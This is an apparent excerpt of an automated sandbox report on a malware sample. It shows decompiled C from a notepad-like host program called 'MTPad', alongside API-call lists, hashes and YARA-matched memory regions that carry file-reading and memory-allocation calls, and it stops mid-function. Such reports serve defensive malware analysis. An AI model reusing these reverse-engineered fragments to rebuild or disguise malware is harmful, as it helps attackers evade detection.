                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003e9
                                                                                                                                                                                                                                                                                          0x001003f1
                                                                                                                                                                                                                                                                                          0x001003f9
                                                                                                                                                                                                                                                                                          0x001003fa
                                                                                                                                                                                                                                                                                          0x001003fb
                                                                                                                                                                                                                                                                                          0x00100409
                                                                                                                                                                                                                                                                                          0x00100409

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu$ItemMessage$AppendCountSend_memset$BeepDestroyInfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2301784159-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f071194ab42ff902778fc6c6e8d3606359301c8c09feefec77e099f7d5ed8b1e
                                                                                                                                                                                                                                                                                          • Instruction ID: a86cd0fa628fbe283c64c88029a2f7ed63e234ae95fccd385ed38fb72dfef956
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f071194ab42ff902778fc6c6e8d3606359301c8c09feefec77e099f7d5ed8b1e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77213970E012699FDB66CB64CD45BDEB7B4BB1C300F0081EAAA49E6180D7B05EC08F60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E00100A20(int _a4, int _a8, long _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				short _v11;
                                                                                                                                                                                                                                                                                          				short _v15;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                                                                                                                                          				struct HHOOK__* _t39;
                                                                                                                                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          				intOrPtr _t44;
                                                                                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t19 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t19 ^ _t46;
                                                                                                                                                                                                                                                                                          				_t43 = _a4;
                                                                                                                                                                                                                                                                                          				_t42 = _a8;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v15 = 0;
                                                                                                                                                                                                                                                                                          				_v11 = 0;
                                                                                                                                                                                                                                                                                          				if(_t43 != 3) {
                                                                                                                                                                                                                                                                                          					if(_t43 == 4) {
                                                                                                                                                                                                                                                                                          						GetClassNameA(_t42,  &_v16, 7);
                                                                                                                                                                                                                                                                                          						if(lstrcmpA("#32768",  &_v16) == 0) {
                                                                                                                                                                                                                                                                                          							_t41 =  *0x17199c; // 0x0
                                                                                                                                                                                                                                                                                          							_t37 =  *((intOrPtr*)(_t41 + 8));
                                                                                                                                                                                                                                                                                          							_t27 = _t37 - 1;
                                                                                                                                                                                                                                                                                          							if(_t27 >= 0 && _t27 < _t37) {
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_t41 + 8)) = _t27;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					GetClassNameA(_t42,  &_v16, 7);
                                                                                                                                                                                                                                                                                          					if(lstrcmpA("#32768",  &_v16) == 0) {
                                                                                                                                                                                                                                                                                          						_t44 =  *0x17199c; // 0x0
                                                                                                                                                                                                                                                                                          						_v20 = _t42;
                                                                                                                                                                                                                                                                                          						E00101C50( &_v20, _t44 + 4);
                                                                                                                                                                                                                                                                                          						_t43 = _a4;
                                                                                                                                                                                                                                                                                          						_t32 = _t32;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t39 =  *0x171998; // 0x0
                                                                                                                                                                                                                                                                                          				return E001059E6(CallNextHookEx(_t39, _t43, _t42, _a12), _t32, _v8 ^ _t46, _t39, _t42, _t43);
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x00100a26
                                                                                                                                                                                                                                                                                          0x00100a2d
                                                                                                                                                                                                                                                                                          0x00100a31
                                                                                                                                                                                                                                                                                          0x00100a37
                                                                                                                                                                                                                                                                                          0x00100a3a
                                                                                                                                                                                                                                                                                          0x00100a3e
                                                                                                                                                                                                                                                                                          0x00100a41
                                                                                                                                                                                                                                                                                          0x00100a48
                                                                                                                                                                                                                                                                                          0x00100a88
                                                                                                                                                                                                                                                                                          0x00100a91
                                                                                                                                                                                                                                                                                          0x00100aa8
                                                                                                                                                                                                                                                                                          0x00100aaa
                                                                                                                                                                                                                                                                                          0x00100ab0
                                                                                                                                                                                                                                                                                          0x00100ab3
                                                                                                                                                                                                                                                                                          0x00100ab8
                                                                                                                                                                                                                                                                                          0x00100abe
                                                                                                                                                                                                                                                                                          0x00100abe
                                                                                                                                                                                                                                                                                          0x00100ab8
                                                                                                                                                                                                                                                                                          0x00100aa8
                                                                                                                                                                                                                                                                                          0x00100a4a
                                                                                                                                                                                                                                                                                          0x00100a51
                                                                                                                                                                                                                                                                                          0x00100a68
                                                                                                                                                                                                                                                                                          0x00100a6a
                                                                                                                                                                                                                                                                                          0x00100a77
                                                                                                                                                                                                                                                                                          0x00100a7a
                                                                                                                                                                                                                                                                                          0x00100a7f
                                                                                                                                                                                                                                                                                          0x00100a82
                                                                                                                                                                                                                                                                                          0x00100a82
                                                                                                                                                                                                                                                                                          0x00100a68
                                                                                                                                                                                                                                                                                          0x00100ac4
                                                                                                                                                                                                                                                                                          0x00100ae3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetClassNameA.USER32(?,00000000,00000007), ref: 00100A51
                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(#32768,00000000), ref: 00100A60
                                                                                                                                                                                                                                                                                            • Part of subcall function 00101C50: __recalloc.LIBCMT ref: 00101C8E
                                                                                                                                                                                                                                                                                          • GetClassNameA.USER32(?,00000000,00000007), ref: 00100A91
                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(#32768,00000000), ref: 00100AA0
                                                                                                                                                                                                                                                                                          • CallNextHookEx.USER32 ref: 00100ACE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ClassNamelstrcmp$CallHookNext__recalloc
                                                                                                                                                                                                                                                                                          • String ID: #32768
                                                                                                                                                                                                                                                                                          • API String ID: 480024222-207879865
                                                                                                                                                                                                                                                                                          • Opcode ID: 1975896e1fddd87b83090447bbe1756855c30799ffb230d2f4fd9244f309dbf3
                                                                                                                                                                                                                                                                                          • Instruction ID: b6658988b5865cb042611c4fd819e1d376935a02396ac2a133c76b5533e98452
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1975896e1fddd87b83090447bbe1756855c30799ffb230d2f4fd9244f309dbf3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221AF35F01209EBDB01DFA4DC84EFEB778EB49714F018559E80897180E7B0AA81CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 025274B2
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 025274D7
                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 025274F0
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0252750C
                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02527534
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02527560
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0252756A
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSizelstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 244179375-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                          • Instruction ID: cc8b22ec0c30ed76d623817cf00939b05c571aecb04b2374c3a207327fe802e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5212E75E00218BBEB14DFA4C849BAEBB78FB48700F108658E615B72C0D7789A84CB54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0252629F
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 025262BB
                                                                                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(-0000000C), ref: 025262CF
                                                                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(-0000000C), ref: 0252630B
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02526332
                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0252633F
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0252634C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepVirtualWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1808503317-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                          • Instruction ID: dcec3734cc170ba0abbe36f6b504c0825eabbe36ed67741d44705c97622f8740
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19212AB5A00218EFE704DF94C948BAEB7B9FB89301F248698E515A72C0C779DE84CB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E000F72C0(void* __ebx, void* __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v308;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                                                                                          				int _t18;
                                                                                                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t22 = __ebx;
                                                                                                                                                                                                                                                                                          				_t9 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                                                                          				_t31 = __ecx;
                                                                                                                                                                                                                                                                                          				if(SendMessageA( *(__ecx + 4), 0xb8, 0, 0) == 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					__eflags = _v8 ^ _t33;
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t22, _v8 ^ _t33, _t30, _t31, _t32);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t15 = GetParent( *(_t31 + 4));
                                                                                                                                                                                                                                                                                          					_t30 = _t31 + 0x15c;
                                                                                                                                                                                                                                                                                          					_t32 = _t15;
                                                                                                                                                                                                                                                                                          					wsprintfA( &_v308, "Save changes to %s ?", _t31 + 0x15c);
                                                                                                                                                                                                                                                                                          					_t18 = MessageBoxA(_t15,  &_v308, "MTPad", 0x33);
                                                                                                                                                                                                                                                                                          					if(_t18 != 2) {
                                                                                                                                                                                                                                                                                          						__eflags = _t18 - 6;
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							goto L5;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t19 = E000F7370(_t31, __eflags);
                                                                                                                                                                                                                                                                                          							__eflags = _t19;
                                                                                                                                                                                                                                                                                          							if(_t19 == 0) {
                                                                                                                                                                                                                                                                                          								goto L2;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L5;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						L2:
                                                                                                                                                                                                                                                                                          						return E001059E6(0, _t22, _v8 ^ _t33, _t30, _t31, _t32);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x000f72c0
                                                                                                                                                                                                                                                                                          0x000f72c9
                                                                                                                                                                                                                                                                                          0x000f72d0
                                                                                                                                                                                                                                                                                          0x000f72d9
                                                                                                                                                                                                                                                                                          0x000f72ec
                                                                                                                                                                                                                                                                                          0x000f7350
                                                                                                                                                                                                                                                                                          0x000f7354
                                                                                                                                                                                                                                                                                          0x000f7364
                                                                                                                                                                                                                                                                                          0x000f72ee
                                                                                                                                                                                                                                                                                          0x000f72f2
                                                                                                                                                                                                                                                                                          0x000f72f8
                                                                                                                                                                                                                                                                                          0x000f72ff
                                                                                                                                                                                                                                                                                          0x000f730d
                                                                                                                                                                                                                                                                                          0x000f7325
                                                                                                                                                                                                                                                                                          0x000f732e
                                                                                                                                                                                                                                                                                          0x000f7342
                                                                                                                                                                                                                                                                                          0x000f7345
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f7347
                                                                                                                                                                                                                                                                                          0x000f7347
                                                                                                                                                                                                                                                                                          0x000f734c
                                                                                                                                                                                                                                                                                          0x000f734e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f734e
                                                                                                                                                                                                                                                                                          0x000f7330
                                                                                                                                                                                                                                                                                          0x000f7330
                                                                                                                                                                                                                                                                                          0x000f7341
                                                                                                                                                                                                                                                                                          0x000f7341
                                                                                                                                                                                                                                                                                          0x000f732e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B8,00000000,00000000), ref: 000F72E4
                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 000F72F2
                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 000F730D
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000F7325
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$ParentSendwsprintf
                                                                                                                                                                                                                                                                                          • String ID: MTPad$Save changes to %s ?
                                                                                                                                                                                                                                                                                          • API String ID: 1966038634-1718077980
                                                                                                                                                                                                                                                                                          • Opcode ID: 6ba25e2805f2609720c1f7e7c467779bb1ecec3f885d156677e271254ca10a76
                                                                                                                                                                                                                                                                                          • Instruction ID: 556951d2f8096a204ce42155d160565b1630d7228954f81e90ab2de9b8217195
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ba25e2805f2609720c1f7e7c467779bb1ecec3f885d156677e271254ca10a76
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E911E531A14208BBC728EB65ED46BEBB3A8FB48310F000169F909C6580EBB0AA51D7D1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FFE10(void* __ebx, void** _a4) {
                                                                                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                                                                                          				void** _t29;
                                                                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(__ebx != 0) {
                                                                                                                                                                                                                                                                                          					_t28 = ( *(__ebx + 0x26) & 0x0000ffff) + ( *(__ebx + 0x24) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					_t33 = GlobalAlloc(2, ( *(__ebx + 0x26) & 0x0000ffff) + ( *(__ebx + 0x24) & 0x0000ffff));
                                                                                                                                                                                                                                                                                          					if(_t33 != 0) {
                                                                                                                                                                                                                                                                                          						E001096A0(GlobalLock(_t33), __ebx, _t28);
                                                                                                                                                                                                                                                                                          						GlobalUnlock(_t33);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t29 = _a4;
                                                                                                                                                                                                                                                                                          					_t12 =  *_t29;
                                                                                                                                                                                                                                                                                          					if(_t12 != 0) {
                                                                                                                                                                                                                                                                                          						GlobalUnlock(_t12);
                                                                                                                                                                                                                                                                                          						GlobalFree( *_t29);
                                                                                                                                                                                                                                                                                          						 *_t29 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *_t29 = _t33;
                                                                                                                                                                                                                                                                                          					if(_t33 == 0) {
                                                                                                                                                                                                                                                                                          						_t29[1] = 0;
                                                                                                                                                                                                                                                                                          						return 0 | _t33 != 0x00000000;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t29[1] = GlobalLock(_t33);
                                                                                                                                                                                                                                                                                          						return 0 | _t33 != 0x00000000;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                                          0x000ffe15
                                                                                                                                                                                                                                                                                          0x000ffe27
                                                                                                                                                                                                                                                                                          0x000ffe32
                                                                                                                                                                                                                                                                                          0x000ffe36
                                                                                                                                                                                                                                                                                          0x000ffe42
                                                                                                                                                                                                                                                                                          0x000ffe4b
                                                                                                                                                                                                                                                                                          0x000ffe4b
                                                                                                                                                                                                                                                                                          0x000ffe51
                                                                                                                                                                                                                                                                                          0x000ffe54
                                                                                                                                                                                                                                                                                          0x000ffe58
                                                                                                                                                                                                                                                                                          0x000ffe5b
                                                                                                                                                                                                                                                                                          0x000ffe64
                                                                                                                                                                                                                                                                                          0x000ffe6a
                                                                                                                                                                                                                                                                                          0x000ffe6a
                                                                                                                                                                                                                                                                                          0x000ffe70
                                                                                                                                                                                                                                                                                          0x000ffe74
                                                                                                                                                                                                                                                                                          0x000ffe8f
                                                                                                                                                                                                                                                                                          0x000ffe9a
                                                                                                                                                                                                                                                                                          0x000ffe76
                                                                                                                                                                                                                                                                                          0x000ffe7d
                                                                                                                                                                                                                                                                                          0x000ffe8a
                                                                                                                                                                                                                                                                                          0x000ffe8a
                                                                                                                                                                                                                                                                                          0x000ffe17
                                                                                                                                                                                                                                                                                          0x000ffe1a
                                                                                                                                                                                                                                                                                          0x000ffe1a

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,?,?,?,?,000F7916,?), ref: 000FFE2C
                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 000FFE39
                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 000FFE42
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,000F7916,?), ref: 000FFE4B
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,000F7916,?), ref: 000FFE5B
                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 000FFE64
                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 000FFE77
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Global$LockUnlock$AllocFree_memmove
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 791280331-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 825e221bd1db4be225a73b1c906cbad01a9055a53f1107767bc1124595f7ed06
                                                                                                                                                                                                                                                                                          • Instruction ID: 5b0d99333e3f84c9431b1391561f1ee645df87ddcfd173c18e92b877945f4bfb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 825e221bd1db4be225a73b1c906cbad01a9055a53f1107767bc1124595f7ed06
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E001D6B290162797C7116FA4A90C9BBBBE8EF587517018121FE04C7615EB74C8A0D6A0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                          			E001057B1() {
                                                                                                                                                                                                                                                                                          				intOrPtr _t2;
                                                                                                                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t15;
                                                                                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if( *0x170c00 == 0 && E00105693() == 0) {
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t2 =  *0x170c00; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t2 == 1) {
                                                                                                                                                                                                                                                                                          					_t13 = HeapAlloc(GetProcessHeap(), 0, 0xd);
                                                                                                                                                                                                                                                                                          					if(_t13 == 0) {
                                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return _t13;
                                                                                                                                                                                                                                                                                          				}
